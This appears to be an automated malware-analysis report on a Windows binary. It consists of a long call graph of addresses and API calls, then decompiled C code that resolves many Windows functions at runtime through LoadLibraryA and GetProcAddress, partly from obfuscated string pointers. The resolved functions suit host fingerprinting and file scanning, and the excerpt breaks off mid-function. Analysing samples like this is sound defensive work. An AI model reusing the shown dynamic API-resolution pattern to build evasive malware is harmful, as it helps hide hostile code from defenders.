402bd4 LocalAlloc 36721->36722 36723 40189e 36722->36723 36724 402bd4 LocalAlloc 36723->36724 36725 4018b4 36724->36725 36726 402bd4 LocalAlloc 36725->36726 36727 4018c9 36726->36727 36728 402bd4 LocalAlloc 36727->36728 36729 4018df 36728->36729 36730 402bd4 LocalAlloc 36729->36730 36731 4018f4 36730->36731 36732 402bd4 LocalAlloc 36731->36732 36733 40190a 36732->36733 36734 402bd4 LocalAlloc 36733->36734 36735 401920 36734->36735 36736 402bd4 LocalAlloc 36735->36736 36737 401935 36736->36737 36738 402bd4 LocalAlloc 36737->36738 36739 40194b 36738->36739 36740 402bd4 LocalAlloc 36739->36740 36741 401961 36740->36741 36742 402bd4 LocalAlloc 36741->36742 36743 401977 36742->36743 36744 402bd4 LocalAlloc 36743->36744 36745 40198c 36744->36745 36746 402bd4 LocalAlloc 36745->36746 36747 4019a2 36746->36747 36748 402bd4 LocalAlloc 36747->36748 36749 4019b7 36748->36749 36750 402bd4 LocalAlloc 36749->36750 36751 4019cc 36750->36751 36752 402bd4 LocalAlloc 36751->36752 36753 4019e1 36752->36753 36754 402bd4 LocalAlloc 36753->36754 36755 4019f7 36754->36755 36756 402bd4 LocalAlloc 36755->36756 36757 401a0d 36756->36757 36758 402bd4 LocalAlloc 36757->36758 36759 401a23 36758->36759 36760 402bd4 LocalAlloc 36759->36760 36761 401a38 36760->36761 36762 402bd4 LocalAlloc 36761->36762 36763 401a4e 36762->36763 36764 402bd4 LocalAlloc 36763->36764 36765 401a63 36764->36765 36766 402bd4 LocalAlloc 36765->36766 36767 401a79 36766->36767 36768 402bd4 LocalAlloc 36767->36768 36769 401a8f 36768->36769 36770 402bd4 LocalAlloc 36769->36770 36771 401aa5 36770->36771 36772 402bd4 LocalAlloc 36771->36772 36773 401aba 36772->36773 36774 402bd4 LocalAlloc 36773->36774 36775 401ad0 36774->36775 36776 402bd4 LocalAlloc 36775->36776 36777 401ae6 36776->36777 36778 402bd4 LocalAlloc 36777->36778 36779 401afc 36778->36779 36780 402bd4 LocalAlloc 36779->36780 36781 401b11 36780->36781 36782 402bd4 LocalAlloc 36781->36782 36783 401b26 36782->36783 36784 402bd4 LocalAlloc 36783->36784 36785 401b3c 36784->36785 36786 402bd4 LocalAlloc 36785->36786 36787 401b52 36786->36787 36788 402bd4 LocalAlloc 36787->36788 36789 401b68 36788->36789 36790 402bd4 LocalAlloc 36789->36790 36791 401b7e 36790->36791 36792 402bd4 LocalAlloc 36791->36792 36793 401b93 36792->36793 36794 402bd4 LocalAlloc 36793->36794 36795 401ba9 36794->36795 36796 402bd4 LocalAlloc 36795->36796 36797 401bbf 36796->36797 36798 402bd4 LocalAlloc 36797->36798 36799 401bd5 36798->36799 36800 402bd4 LocalAlloc 36799->36800 36801 401beb 36800->36801 36802 402bd4 LocalAlloc 36801->36802 36803 401c01 36802->36803 36804 402bd4 LocalAlloc 36803->36804 36805 401c17 36804->36805 36806 402bd4 LocalAlloc 36805->36806 36807 401c2d 36806->36807 36808 402bd4 LocalAlloc 36807->36808 36809 401c43 36808->36809 36810 402bd4 LocalAlloc 36809->36810 36811 401c59 36810->36811 36812 402bd4 LocalAlloc 36811->36812 36813 401c6f 36812->36813 36814 402bd4 LocalAlloc 36813->36814 36815 401c85 36814->36815 36816 402bd4 LocalAlloc 36815->36816 36817 401c9b 36816->36817 36818 402bd4 LocalAlloc 36817->36818 36819 401cb0 36818->36819 36820 402bd4 LocalAlloc 36819->36820 36821 401cc6 36820->36821 36822 402bd4 LocalAlloc 36821->36822 36823 401cdc 36822->36823 36824 402bd4 LocalAlloc 36823->36824 36825 401cf2 36824->36825 36826 402bd4 LocalAlloc 36825->36826 36827 401d08 36826->36827 36828 402bd4 LocalAlloc 36827->36828 36829 401d1e 36828->36829 36830 402bd4 LocalAlloc 36829->36830 36831 401d33 36830->36831 36832 402bd4 LocalAlloc 36831->36832 36833 401d49 36832->36833 36834 402bd4 LocalAlloc 36833->36834 36835 401d5f 36834->36835 36836 402bd4 LocalAlloc 36835->36836 36837 401d75 36836->36837 36838 402bd4 LocalAlloc 36837->36838 36839 401d8b 36838->36839 36840 402bd4 LocalAlloc 36839->36840 36841 401da1 36840->36841 36842 402bd4 LocalAlloc 36841->36842 36843 401db7 36842->36843 36844 402bd4 LocalAlloc 36843->36844 36845 401dcd 36844->36845 36846 402bd4 LocalAlloc 36845->36846 36847 401de2 36846->36847 36848 402bd4 LocalAlloc 36847->36848 36849 401df7 36848->36849 36850 402bd4 LocalAlloc 36849->36850 36851 401e0d 36850->36851 36852 402bd4 LocalAlloc 36851->36852 36853 401e23 36852->36853 36854 402bd4 LocalAlloc 36853->36854 36855 401e39 36854->36855 36856 402bd4 LocalAlloc 36855->36856 36857 401e4f 36856->36857 36858 402bd4 LocalAlloc 36857->36858 36859 401e65 36858->36859 36860 402bd4 LocalAlloc 36859->36860 36861 401e7a 36860->36861 36862 402bd4 LocalAlloc 36861->36862 36863 401e90 36862->36863 36864 402bd4 LocalAlloc 36863->36864 36865 401ea6 36864->36865 36866 402bd4 LocalAlloc 36865->36866 36867 401ebc 36866->36867 36868 402bd4 LocalAlloc 36867->36868 36869 401ed2 36868->36869 36870 402bd4 LocalAlloc 36869->36870 36871 401ee8 36870->36871 36872 402bd4 LocalAlloc 36871->36872 36873 401efe 36872->36873 36874 402bd4 LocalAlloc 36873->36874 36875 401f14 36874->36875 36876 402bd4 LocalAlloc 36875->36876 36877 401f2a 36876->36877 36878 402bd4 LocalAlloc 36877->36878 36879 401f3f 36878->36879 36880 402bd4 LocalAlloc 36879->36880 36881 401f55 36880->36881 36882 402bd4 LocalAlloc 36881->36882 36883 401f6b 36882->36883 36884 402bd4 LocalAlloc 36883->36884 36885 401f81 36884->36885 36886 402bd4 LocalAlloc 36885->36886 36887 401f97 36886->36887 36888 402bd4 LocalAlloc 36887->36888 36889 401fad 36888->36889 36890 402bd4 LocalAlloc 36889->36890 36891 401fc2 36890->36891 36892 402bd4 LocalAlloc 36891->36892 36893 401fd8 36892->36893 36894 402bd4 LocalAlloc 36893->36894 36895 401fee 36894->36895 36896 402bd4 LocalAlloc 36895->36896 36897 402004 36896->36897 36898 402bd4 LocalAlloc 36897->36898 36899 40201a 36898->36899 36900 402bd4 LocalAlloc 36899->36900 36901 402030 36900->36901 36902 402bd4 LocalAlloc 36901->36902 36903 402046 36902->36903 36904 402bd4 LocalAlloc 36903->36904 36905 40205c 36904->36905 36906 402bd4 LocalAlloc 36905->36906 36907 402072 36906->36907 36908 402bd4 LocalAlloc 36907->36908 36909 402088 36908->36909 36910 402bd4 LocalAlloc 36909->36910 36911 40209e 36910->36911 36912 402bd4 LocalAlloc 36911->36912 36913 4020b4 36912->36913 36914 402bd4 LocalAlloc 36913->36914 36915 4020ca 36914->36915 36916 402bd4 LocalAlloc 36915->36916 36917 4020e0 36916->36917 36918 402bd4 LocalAlloc 36917->36918 36919 4020f6 36918->36919 36920 402bd4 LocalAlloc 36919->36920 36921 40210c 36920->36921 36922 402bd4 LocalAlloc 36921->36922 36923 402121 36922->36923 36924 402bd4 LocalAlloc 36923->36924 36925 402137 36924->36925 36926 402bd4 LocalAlloc 36925->36926 36927 40214d 36926->36927 36928 402bd4 LocalAlloc 36927->36928 36929 402163 36928->36929 36930 402bd4 LocalAlloc 36929->36930 36931 402179 36930->36931 36932 402bd4 LocalAlloc 36931->36932 36933 40218f 36932->36933 36934 402bd4 LocalAlloc 36933->36934 36935 4021a5 36934->36935 36936 402bd4 LocalAlloc 36935->36936 36937 4021ba 36936->36937 36938 402bd4 LocalAlloc 36937->36938 36939 4021cf 36938->36939 36940 402bd4 LocalAlloc 36939->36940 36941 4021e5 36940->36941 36942 402bd4 LocalAlloc 36941->36942 36943 4021fb 36942->36943 36944 402bd4 LocalAlloc 36943->36944 36945 402211 36944->36945 36946 402bd4 LocalAlloc 36945->36946 36947 402226 36946->36947 36948 402bd4 LocalAlloc 36947->36948 36949 40223c 36948->36949 36950 402bd4 LocalAlloc 36949->36950 36951 402252 36950->36951 36952 402bd4 LocalAlloc 36951->36952 36953 402268 36952->36953 36954 402bd4 LocalAlloc 36953->36954 36955 40227e 36954->36955 36956 402bd4 LocalAlloc 36955->36956 36957 402294 36956->36957 36958 402bd4 LocalAlloc 36957->36958 36959 4022aa 36958->36959 36960 402bd4 LocalAlloc 36959->36960 36961 4022c0 36960->36961 36962 402bd4 LocalAlloc 36961->36962 36963 4022d5 36962->36963 36964 402bd4 LocalAlloc 36963->36964 36965 4022eb 36964->36965 36966 402bd4 LocalAlloc 36965->36966 36967 402300 36966->36967 36968 402bd4 LocalAlloc 36967->36968 36969 402316 36968->36969 36970 402bd4 LocalAlloc 36969->36970 36971 40232c 36970->36971 36972 402bd4 LocalAlloc 36971->36972 36973 402341 36972->36973 36974 402bd4 LocalAlloc 36973->36974 36975 402357 36974->36975 36976 402bd4 LocalAlloc 36975->36976 36977 40236d 36976->36977 36978 402bd4 LocalAlloc 36977->36978 36979 402383 36978->36979 36980 402bd4 LocalAlloc 36979->36980 36981 402399 36980->36981 36982 402bd4 LocalAlloc 36981->36982 36983 4023af 36982->36983 36984 402bd4 LocalAlloc 36983->36984 36985 4023c5 36984->36985 36986 402bd4 LocalAlloc 36985->36986 36987 4023da 36986->36987 36988 402bd4 LocalAlloc 36987->36988 36989 4023ef 36988->36989 36990 402bd4 LocalAlloc 36989->36990 36991 402405 36990->36991 36992 402bd4 LocalAlloc 36991->36992 36993 40241b 36992->36993 36994 402bd4 LocalAlloc 36993->36994 36995 402431 36994->36995 36996 402bd4 LocalAlloc 36995->36996 36997 402447 36996->36997 36998 402bd4 LocalAlloc 36997->36998 36999 40245d 36998->36999 37000 402bd4 LocalAlloc 36999->37000 37001 402473 37000->37001 37002 402bd4 LocalAlloc 37001->37002 37003 402488 37002->37003 37004 402bd4 LocalAlloc 37003->37004 37005 40249e 37004->37005 37006 402bd4 LocalAlloc 37005->37006 37007 4024b4 37006->37007 37008 402bd4 LocalAlloc 37007->37008 37009 4024ca 37008->37009 37010 402bd4 LocalAlloc 37009->37010 37011 4024df 37010->37011 37012 402bd4 LocalAlloc 37011->37012 37013 4024f5 37012->37013 37014 402bd4 LocalAlloc 37013->37014 37015 40250b 37014->37015 37016 402bd4 LocalAlloc 37015->37016 37017 402520 37016->37017 37018 402bd4 LocalAlloc 37017->37018 37019 402535 37018->37019 37020 402bd4 LocalAlloc 37019->37020 37021 40254b 37020->37021 37022 402bd4 LocalAlloc 37021->37022 37023 402561 37022->37023 37024 402bd4 LocalAlloc 37023->37024 37025 402577 37024->37025 37026 402bd4 LocalAlloc 37025->37026 37027 40258d 37026->37027 37028 402bd4 LocalAlloc 37027->37028 37029 4025a3 37028->37029 37030 402bd4 LocalAlloc 37029->37030 37031 4025b9 37030->37031 37032 402bd4 LocalAlloc 37031->37032 37033 4025cf 37032->37033 37034 402bd4 LocalAlloc 37033->37034 37035 4025e7 37034->37035 37036 402bd4 LocalAlloc 37035->37036 37037 4025fc 37036->37037 37038 402bd4 LocalAlloc 37037->37038 37039 402611 37038->37039 37040 402bd4 LocalAlloc 37039->37040 37041 402626 37040->37041 37042 402bd4 LocalAlloc 37041->37042 37043 40263c 37042->37043 37044 402bd4 LocalAlloc 37043->37044 37045 402652 37044->37045 37046 402bd4 LocalAlloc 37045->37046 37047 402667 37046->37047 37048 402bd4 LocalAlloc 37047->37048 37049 40267c 37048->37049 37050 402bd4 LocalAlloc 37049->37050 37051 402692 37050->37051 37052 402bd4 LocalAlloc 37051->37052 37053 4026a7 37052->37053 37054 402bd4 LocalAlloc 37053->37054 37055 4026bd 37054->37055 37056 402bd4 LocalAlloc 37055->37056 37057 4026d3 37056->37057 37058 402bd4 LocalAlloc 37057->37058 37059 4026e8 37058->37059 37060 402bd4 LocalAlloc 37059->37060 37061 4026fe 37060->37061 37062 402bd4 LocalAlloc 37061->37062 37063 402714 37062->37063 37064 402bd4 LocalAlloc 37063->37064 37065 40272a 37064->37065 37066 402bd4 LocalAlloc 37065->37066 37067 40273f 37066->37067 37068 402bd4 LocalAlloc 37067->37068 37069 402755 37068->37069 37070 402bd4 LocalAlloc 37069->37070 37071 40276b 37070->37071 37072 402bd4 LocalAlloc 37071->37072 37073 402781 37072->37073 37074 402bd4 LocalAlloc 37073->37074 37075 402797 37074->37075 37076 402bd4 LocalAlloc 37075->37076 37077 4027ad 37076->37077 37078 402bd4 LocalAlloc 37077->37078 37079 4027c2 37078->37079 37080 402bd4 LocalAlloc 37079->37080 37081 4027d8 37080->37081 37082 402bd4 LocalAlloc 37081->37082 37083 4027ed 37082->37083 37084 402bd4 LocalAlloc 37083->37084 37085 402803 37084->37085 37086 402bd4 LocalAlloc 37085->37086 37087 402819 37086->37087 37088 402bd4 LocalAlloc 37087->37088 37089 40282e 37088->37089 37090 402bd4 LocalAlloc 37089->37090 37091 402843 37090->37091 37092 402bd4 LocalAlloc 37091->37092 37093 402858 37092->37093 37094 402bd4 LocalAlloc 37093->37094 37095 40286e 37094->37095 37096 402bd4 LocalAlloc 37095->37096 37097 402883 37096->37097 37098 402bd4 LocalAlloc 37097->37098 37099 402898 37098->37099 37100 402bd4 LocalAlloc 37099->37100 37101 4028ad 37100->37101 37102 402bd4 LocalAlloc 37101->37102 37103 4028c2 37102->37103 37104 402bd4 LocalAlloc 37103->37104 37105 4028d7 37104->37105 37106 402bd4 LocalAlloc 37105->37106 37107 4028ed 37106->37107 37108 402bd4 LocalAlloc 37107->37108 37109 402903 37108->37109 37110 402bd4 LocalAlloc 37109->37110 37111 402919 37110->37111 37112 402bd4 LocalAlloc 37111->37112 37113 40292e 37112->37113 37114 402bd4 LocalAlloc 37113->37114 37115 402943 37114->37115 37116 402bd4 LocalAlloc 37115->37116 37117 402958 37116->37117 37118 402bd4 LocalAlloc 37117->37118 37119 40296d 37118->37119 37120 402bd4 LocalAlloc 37119->37120 37121 402982 37120->37121 37122 402bd4 LocalAlloc 37121->37122 37123 402998 37122->37123 37124 402bd4 LocalAlloc 37123->37124 37125 4029ae 37124->37125 37126 402bd4 LocalAlloc 37125->37126 37127 4029c4 37126->37127 37128 402bd4 LocalAlloc 37127->37128 37129 4029d9 37128->37129 37130 402bd4 LocalAlloc 37129->37130 37131 4029ef 37130->37131 37132 402bd4 LocalAlloc 37131->37132 37133 402a05 37132->37133 37134 402bd4 LocalAlloc 37133->37134 37135 402a1b 37134->37135 37136 402bd4 LocalAlloc 37135->37136 37137 402a30 37136->37137 37138 402bd4 LocalAlloc 37137->37138 37139 402a46 37138->37139 37140 402bd4 LocalAlloc 37139->37140 37141 402a5b 37140->37141 37142 402bd4 LocalAlloc 37141->37142 37143 402a70 37142->37143 37144 402bd4 LocalAlloc 37143->37144 37145 402a85 37144->37145 37146 402bd4 LocalAlloc 37145->37146 37147 402a9b 37146->37147 37148 402bd4 LocalAlloc 37147->37148 37149 402ab0 37148->37149 37150 402bd4 LocalAlloc 37149->37150 37151 402ac6 37150->37151 37152 402bd4 LocalAlloc 37151->37152 37153 402adb 37152->37153 37154 402bd4 LocalAlloc 37153->37154 37155 402af0 37154->37155 37156 402bd4 LocalAlloc 37155->37156 37157 402b06 37156->37157 37158 402bd4 LocalAlloc 37157->37158 37159 402b1c 37158->37159 37160 402bd4 LocalAlloc 37159->37160 37161 402b32 37160->37161 37162 402bd4 LocalAlloc 37161->37162 37163 402b47 37162->37163 37164 402bd4 LocalAlloc 37163->37164 37165 402b5d 37164->37165 37166 402bd4 LocalAlloc 37165->37166 37167 402b72 37166->37167 37168 402bd4 LocalAlloc 37167->37168 37169 402b88 37168->37169 37170 402bd4 LocalAlloc 37169->37170 37171 402b9e 37170->37171 37172 402bd4 LocalAlloc 37171->37172 37173 402bb4 37172->37173 37174 402bd4 LocalAlloc 37173->37174 37175 402bca 37174->37175 37176 419473 LoadLibraryA 37175->37176 37177 419491 GetProcAddress GetProcAddress 37176->37177 37178 41968c 12 API calls 37176->37178 37181 4194bc 27 API calls 37177->37181 37179 4197a7 37178->37179 37180 41973b 6 API calls 37178->37180 37182 4197e2 37179->37182 37183 4197ae GetProcAddress GetProcAddress GetProcAddress 37179->37183 37180->37179 37181->37178 37184 4197ea 10 API calls 37182->37184 37185 41989d 37182->37185 37183->37182 37184->37185 37186 4198a5 13 API calls 37185->37186 37187 41998e 37185->37187 37186->37187 37188 419a14 37187->37188 37189 419996 7 API calls 37187->37189 37190 419a72 37188->37190 37191 419a1b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37188->37191 37189->37188 37192 419a7d 11 API calls 37190->37192 37193 419b3f 37190->37193 37191->37190 37192->37193 37194 419b46 GetProcAddress GetProcAddress GetProcAddress 37193->37194 37195 419b7c 37193->37195 37194->37195 37196 419b83 GetProcAddress GetProcAddress GetProcAddress 37195->37196 37197 419bb6 37195->37197 37196->37197 37198 419c12 37197->37198 37199 419bbd GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37197->37199 37200 419c1a GetProcAddress 37198->37200 37201 40b632 37198->37201 37199->37198 37200->37201 37202 415610 GetSystemInfo 37201->37202 37288 417463 37202->37288 37206 415543 __EH_prolog3 37205->37206 37479 415c16 GetCurrentHwProfileA 37206->37479 37209 40c689 77 API calls 37210 415578 37209->37210 37485 415c6d 37210->37485 37213 40c689 77 API calls 37214 415597 37213->37214 37215 40d431 77 API calls 37214->37215 37216 4155a7 ctype 37215->37216 37217 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37216->37217 37218 40b66d 37217->37218 37219 40d431 37218->37219 37220 40d44b 37219->37220 37222 40d454 37220->37222 37496 40d270 77 API calls 3 library calls 37220->37496 37222->36347 37223->36364 37224->36364 37225->36364 37226->36364 37227->36370 37228->36370 37229->36362 37230->36366 37231->36373 37232->36378 37233->36382 37234->36384 37235->36386 37236->36388 37237->36390 37238->36394 37239->36396 37240->36398 37241->36400 37242->36402 37243->36404 37244->36406 37245->36408 37246->36410 37247->36412 37248->36414 37249->36416 37250->36418 37251->36420 37252->36422 37253->36424 37254->36426 37255->36428 37256->36430 37257->36432 37258->36434 37259->36438 37260->36442 37261->36446 37262->36450 37263->36454 37264->36458 37265->36462 37266->36466 37267->36468 37268->36472 37269->36474 37270->36478 37271->36486 37272->36475 37273->36479 37274->36492 37275->36497 37276->36501 37277->36485 37278->36488 37279->36500 37280->36504 37281->36508 37282->36507 37283->36527 37284->36521 37285->36529 37287 401171 37286->37287 37287->36556 37289 417472 __EH_prolog3_GS 37288->37289 37302 4169f3 37289->37302 37291 4174c4 37306 414f20 37291->37306 37293 4174eb 37316 417da6 37293->37316 37295 417517 37330 40c982 37295->37330 37297 417526 ctype 37333 40b593 37297->37333 37301 40b63f 37301->36342 37303 4169ff __EH_prolog3 37302->37303 37340 414c17 37303->37340 37305 416a0f std::locale::_Init 37305->37291 37307 414f2c __EH_prolog3 37306->37307 37448 41d5c1 37307->37448 37310 41eb16 std::locale::_Init 77 API calls 37311 414f48 37310->37311 37312 41d9c9 std::locale::_Init 82 API calls 37311->37312 37314 414f62 std::locale::_Init ctype 37311->37314 37313 414f54 37312->37313 37315 40f13e std::locale::facet::_Incref 2 API calls 37313->37315 37314->37293 37315->37314 37317 417db2 __EH_prolog3_catch 37316->37317 37454 416a67 37317->37454 37319 417dc5 37320 40f3f7 2 API calls 37319->37320 37329 417df5 37319->37329 37324 417de0 37320->37324 37321 417e6f 37458 416ac3 37321->37458 37462 41914c 114 API calls 7 library calls 37324->37462 37325 417e7c std::locale::_Init 37325->37295 37327 417dea 37328 407d49 std::ios_base::_Ios_base_dtor 2 API calls 37327->37328 37328->37329 37329->37321 37463 4143b2 67 API calls 37329->37463 37466 40d0d9 37330->37466 37334 40b59e 37333->37334 37475 41d4ea 37334->37475 37336 40b5aa 37337 421a61 37336->37337 37338 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37337->37338 37339 421a6b 37338->37339 37339->37339 37341 414c23 __EH_prolog3 37340->37341 37344 414ea2 37341->37344 37343 414c4c std::locale::_Init 37343->37305 37345 41eb16 std::locale::_Init 77 API calls 37344->37345 37346 414ed6 37345->37346 37347 414ef0 37346->37347 37355 41d9c9 37346->37355 37371 414fcb 37347->37371 37350 414ee2 37379 40f13e 37350->37379 37351 414f09 37352 414f1b 37351->37352 37384 4143b2 67 API calls 37351->37384 37352->37343 37356 41d9d5 __EH_prolog3 37355->37356 37357 41da50 std::locale::_Init 37356->37357 37385 41d582 37356->37385 37357->37350 37360 41eb16 std::locale::_Init 77 API calls 37362 41da00 37360->37362 37365 41da0d 37362->37365 37393 41d926 66 API calls _Yarn 37362->37393 37389 41d78e 37365->37389 37368 41da2d 37369 40f13e std::locale::facet::_Incref 2 API calls 37368->37369 37370 41da3a 37369->37370 37395 41d5aa 37370->37395 37372 414fd7 __EH_prolog3 37371->37372 37412 40f3f7 37372->37412 37376 414fec 37433 407d49 37376->37433 37378 414ffb std::locale::_Init 37378->37351 37380 41d582 std::_Lockit::_Lockit EnterCriticalSection 37379->37380 37381 40f14f 37380->37381 37382 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37381->37382 37383 40f163 37382->37383 37383->37347 37384->37352 37386 41d5a2 37385->37386 37387 41d594 37385->37387 37386->37360 37386->37370 37399 41dde4 EnterCriticalSection 37387->37399 37390 41d79c 37389->37390 37391 41d7ad 37389->37391 37400 41de04 37390->37400 37394 41d881 66 API calls 3 library calls 37391->37394 37393->37365 37394->37368 37396 41d5b1 37395->37396 37398 41d5bf 37395->37398 37411 41ddf4 LeaveCriticalSection 37396->37411 37398->37357 37399->37386 37401 41de12 37400->37401 37402 41de18 RtlEncodePointer 37400->37402 37403 42f079 _abort DecodePointer 37401->37403 37402->37391 37404 423ea9 37403->37404 37405 42f086 _raise 67 API calls 37404->37405 37406 423eb4 37404->37406 37405->37406 37407 423ecc 37406->37407 37408 424d60 __call_reportfault 8 API calls 37406->37408 37409 4243ae __amsg_exit 66 API calls 37407->37409 37408->37407 37410 423ed6 37409->37410 37411->37398 37413 40f13e std::locale::facet::_Incref 2 API calls 37412->37413 37414 40f403 37413->37414 37415 415153 37414->37415 37416 41515f __EH_prolog3 37415->37416 37417 41d582 std::_Lockit::_Lockit EnterCriticalSection 37416->37417 37418 415169 37417->37418 37437 40f10d 37418->37437 37420 415180 37422 415194 37420->37422 37443 40f1bf 114 API calls 3 library calls 37420->37443 37421 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37423 4151e9 std::locale::_Init 37421->37423 37422->37421 37423->37376 37425 4151a4 37426 4151c6 37425->37426 37444 41e1c5 66 API calls std::exception::exception 37425->37444 37427 40f13e std::locale::facet::_Incref 2 API calls 37426->37427 37429 4151d6 37427->37429 37446 41d711 77 API calls std::locale::_Init 37429->37446 37430 4151b8 37445 421126 RaiseException 37430->37445 37434 407d4f 37433->37434 37436 407d54 37433->37436 37447 407d0e EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::facet::_Incref 37434->37447 37436->37378 37438 40f116 37437->37438 37439 40f13a 37437->37439 37440 41d582 std::_Lockit::_Lockit EnterCriticalSection 37438->37440 37439->37420 37441 40f120 37440->37441 37442 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37441->37442 37442->37439 37443->37425 37444->37430 37445->37426 37446->37422 37447->37436 37449 41eb16 std::locale::_Init 77 API calls 37448->37449 37450 41d5cd 37449->37450 37453 41ddc4 InitializeCriticalSection 37450->37453 37452 414f3d 37452->37310 37453->37452 37455 416a73 __EH_prolog3 37454->37455 37456 416aa9 std::locale::_Init 37455->37456 37464 41437f 67 API calls 37455->37464 37456->37319 37459 416acf __EH_prolog3 37458->37459 37460 416ae6 std::locale::_Init 37459->37460 37465 416b08 67 API calls 2 library calls 37459->37465 37460->37325 37462->37327 37463->37321 37464->37456 37465->37460 37467 40d0e5 __EH_prolog3_GS 37466->37467 37468 40d139 37467->37468 37469 40d0fa 37467->37469 37471 403a16 numpunct 77 API calls 37468->37471 37472 40d122 ctype 37468->37472 37470 403a16 numpunct 77 API calls 37469->37470 37470->37472 37471->37472 37473 421a61 ctype 5 API calls 37472->37473 37474 40c995 37473->37474 37474->37297 37476 41d4f9 std::ios_base::_Tidy 37475->37476 37477 407d49 std::ios_base::_Ios_base_dtor 2 API calls 37476->37477 37478 41d51e codecvt 37476->37478 37477->37478 37478->37336 37480 415c4e 37479->37480 37481 40381a numpunct 77 API calls 37480->37481 37482 415c5e 37481->37482 37483 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37482->37483 37484 415568 37483->37484 37484->37209 37494 427e30 37485->37494 37488 415ce9 RegCloseKey CharToOemA 37490 40381a numpunct 77 API calls 37488->37490 37489 415cce RegQueryValueExA 37489->37488 37491 415d1a 37490->37491 37492 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37491->37492 37493 415586 37492->37493 37493->37213 37495 415cad RegOpenKeyExA 37494->37495 37495->37488 37495->37489 37496->37222

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 98%
                                                                                			E00419473() {
                                                                                				struct HINSTANCE__* _v8;
                                                                                				struct HINSTANCE__* _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				struct HINSTANCE__* _v20;
                                                                                				struct HINSTANCE__* _v24;
                                                                                				struct HINSTANCE__* _v28;
                                                                                				struct HINSTANCE__* _v32;
                                                                                				struct HINSTANCE__* _v36;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				struct HINSTANCE__* _t20;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				_Unknown_base(*)()* _t30;
                                                                                				_Unknown_base(*)()* _t31;
                                                                                				_Unknown_base(*)()* _t89;
                                                                                				struct HINSTANCE__* _t119;
                                                                                				struct HINSTANCE__* _t122;
                                                                                				struct HINSTANCE__* _t126;
                                                                                				struct HINSTANCE__* _t127;
                                                                                				struct HINSTANCE__* _t128;
                                                                                				struct HINSTANCE__* _t129;
                                                                                				struct HINSTANCE__* _t130;
                                                                                				struct HINSTANCE__* _t131;
                                                                                				struct HINSTANCE__* _t132;
                                                                                				struct HINSTANCE__* _t133;
                                                                                				struct HINSTANCE__* _t134;
                                                                                
                                                                                				_t126 = LoadLibraryA( *0x449bec);
                                                                                				if(_t126 != 0) {
                                                                                					 *0x44a1b0 = GetProcAddress(_t126,  *0x449c74);
                                                                                					_t89 = GetProcAddress(_t126,  *0x449e00);
                                                                                					 *0x44a160 = _t89;
                                                                                					 *0x44a1dc =  *_t89(_t126,  *0x449d54);
                                                                                					 *0x44a1e0 = GetProcAddress(_t126, "CreateThread");
                                                                                					 *0x44a228 = GetProcAddress(_t126, "GlobalMemoryStatusEx");
                                                                                					 *0x44a1cc = GetProcAddress(_t126, "IsWow64Process");
                                                                                					 *0x44a124 = GetProcAddress(_t126, "GetUserDefaultLocaleName");
                                                                                					 *0x44a11c = GetProcAddress(_t126, "GetSystemInfo");
                                                                                					 *0x44a184 = GetProcAddress(_t126, "WideCharToMultiByte");
                                                                                					 *0x44a21c = GetProcAddress(_t126, "LocalFree");
                                                                                					 *0x44a1ac = GetProcAddress(_t126, "HeapAlloc");
                                                                                					 *0x44a1f4 = GetProcAddress(_t126, "GetProcessHeap");
                                                                                					 *0x44a0f0 = GetProcAddress(_t126, "CreateFileA");
                                                                                					 *0x44a1fc = GetProcAddress(_t126, "GetFileSize");
                                                                                					 *0x44a194 = GetProcAddress(_t126, "ReadFile");
                                                                                					 *0x44a0f4 = GetProcAddress(_t126, "CloseHandle");
                                                                                					 *0x44a180 = GetProcAddress(_t126, "GetLogicalDriveStringsA");
                                                                                					 *0x44a128 = GetProcAddress(_t126, "lstrlenA");
                                                                                					 *0x44a110 = GetProcAddress(_t126, "GetDriveTypeA");
                                                                                					 *0x44a220 = GetProcAddress(_t126, "lstrcpyA");
                                                                                					 *0x44a0dc = GetProcAddress(_t126, "MultiByteToWideChar");
                                                                                					 *0x44a1b8 = GetProcAddress(_t126, "lstrcatA");
                                                                                					 *0x44a22c = GetProcAddress(_t126, "FindFirstFileA");
                                                                                					 *0x44a138 = GetProcAddress(_t126, "FindNextFileA");
                                                                                					 *0x44a0e8 = GetProcAddress(_t126, "FindClose");
                                                                                					 *0x44a18c = GetProcAddress(_t126, "CreateMutexA");
                                                                                					 *0x44a19c = GetProcAddress(_t126, "GetLastError");
                                                                                					 *0x44a174 = GetProcAddress(_t126, "lstrcpynA");
                                                                                					 *0x44a100 = GetProcAddress(_t126, "GlobalLock");
                                                                                					 *0x44a0b8 = GetProcAddress(_t126, "GlobalSize");
                                                                                				}
                                                                                				_t19 = LoadLibraryA( *0x449d1c); // executed
                                                                                				_t127 = _t19; // executed
                                                                                				_t20 = LoadLibraryA( *0x449c3c); // executed
                                                                                				_v12 = _t20;
                                                                                				_t122 = LoadLibraryA( *0x449f40);
                                                                                				_t119 = LoadLibraryA( *0x449cf0);
                                                                                				_v16 = LoadLibraryA( *0x449bd0);
                                                                                				_v20 = LoadLibraryA( *0x449f84);
                                                                                				_v24 = LoadLibraryA( *0x449b98);
                                                                                				_t26 = LoadLibraryA( *0x449c80); // executed
                                                                                				_v28 = _t26;
                                                                                				_v32 = LoadLibraryA("shell32.dll");
                                                                                				_v36 = LoadLibraryA("shlwapi.dll");
                                                                                				_t29 = LoadLibraryA("dbghelp.dll"); // executed
                                                                                				_v8 = _t29;
                                                                                				_t30 = LoadLibraryA("gdiplus.dll");
                                                                                				if(_t127 != 0) {
                                                                                					 *0x44a158 = GetProcAddress(_t127,  *0x449bbc);
                                                                                					 *0x44a1b4 = GetProcAddress(_t127,  *0x449fc0);
                                                                                					 *0x44a120 = GetProcAddress(_t127,  *0x449e48);
